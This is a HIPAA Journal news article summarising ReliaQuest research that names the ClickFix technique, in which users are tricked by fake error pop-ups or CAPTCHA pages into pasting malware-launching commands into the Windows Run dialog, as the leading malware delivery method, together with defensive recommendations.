25% off all training courses Offer ends July 30, 2026
View HIPAA Courses
25% off all training courses
View HIPAA Courses
Offer ends July 30, 2026

The HIPAA Journal is the leading provider of HIPAA training, news, regulatory updates, and independent compliance advice.

ClickFix Social Engineering Technique is the Leading Method for Malware Delivery

The ClickFix social engineering technique is the leading method of malware delivery, according to an analysis by researchers at ReliaQuest. The researchers analyzed cyberattacks between March 1 and March 31, 2026, and found that attackers were most commonly exploiting trusted identities, devices, and tools in their attacks. This approach allows the attackers to hide their activities, which resemble normal user behavior, and bypass traditional perimeter and file scanning defenses.

The leading technique was ClickFix, which involves tricking users into pasting the attacker’s commands and scripts into trusted system dialogs, such as the Windows Run dialog. Pressing the Windows Key + R, launches the Run dialog, and the user is convinced to copy the supplied code into the dialog and execute it, having been tricked into thinking that the command will resolve an IT issue.

For instance, a user visits a website that triggers a pop-up, warning them that their browser contains a vulnerability or an image failed to load. They are told to click a button, which copies code, and then paste that command into the Run dialog and press Enter, thus executing the command. Other methods involve generating a fake CAPTCHA page, informing the user that they need to complete the test to verify they are human by pasting and running the command. That command launches PowerShell code that delivers the malware payload.

ReliaQuest researchers report that this technique is commonly used to deliver the NetSupport RAT, a remote access Trojan, and Deepload fileless malware, although they observed this technique being used to deliver a range of malware variants. This approach has also been used against MacOS users for the first time, delivering Atomic Stealer (AMOS), which can steal browser credentials, session cookies, cryptocurrency wallets, and keychain data.

Get The FREE
HIPAA Compliance Checklist

Immediate Delivery of Checklist Link To Your Email Address

Please Enter Correct Email Address

Your Privacy Respected

HIPAA Journal Privacy Policy

ReliaQuest recommends companies add this method of attack to their security awareness training programs, warning employees not to paste commands into dialog boxes, such as Run, Terminal, or Script Editor, to consider restricting the use of the Run feature, restrict users from executing executable files, and use web filters to block pop-ups and prevent access to malicious websites.

Author: Steve Alder is the editor-in-chief of The HIPAA Journal. Steve is responsible for editorial policy regarding the topics covered in The HIPAA Journal. He is a specialist on healthcare industry legal and regulatory affairs, and has 10 years of experience writing about HIPAA and other related legal topics. Steve has developed a deep understanding of regulatory issues surrounding the use of information technology in the healthcare industry and has written hundreds of articles on HIPAA-related topics. Steve shapes the editorial policy of The HIPAA Journal, ensuring its comprehensive coverage of critical topics. Steve Alder is considered an authority in the healthcare industry on HIPAA. The HIPAA Journal has evolved into the leading independent authority on HIPAA under Steve’s editorial leadership. Steve manages a team of writers and is responsible for the factual and legal accuracy of all content published on The HIPAA Journal. Steve holds a Bachelor’s of Science degree from the University of Liverpool. You can connect with Steve via LinkedIn or email via stevealder(at)hipaajournal.com

x

Is Your Organization HIPAA Compliant?

Find Out With Our Free HIPAA Compliance Checklist

Get Free Checklist